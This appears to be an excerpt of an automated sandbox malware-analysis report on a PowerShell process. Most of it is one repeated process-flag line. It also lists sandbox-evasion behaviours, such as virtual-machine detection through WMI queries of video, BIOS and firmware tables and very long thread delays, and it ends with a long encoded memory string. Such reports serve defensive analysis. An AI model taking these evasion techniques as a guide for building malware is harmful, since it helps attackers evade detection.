                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                              Query firmware table information (likely to detect VMs)
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3317Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 452Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4417Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5369Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4156Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -180000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07232920 GetSystemInfo,4_2_07232920
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: powershell.exe, 0000000A.00000002.2615868252.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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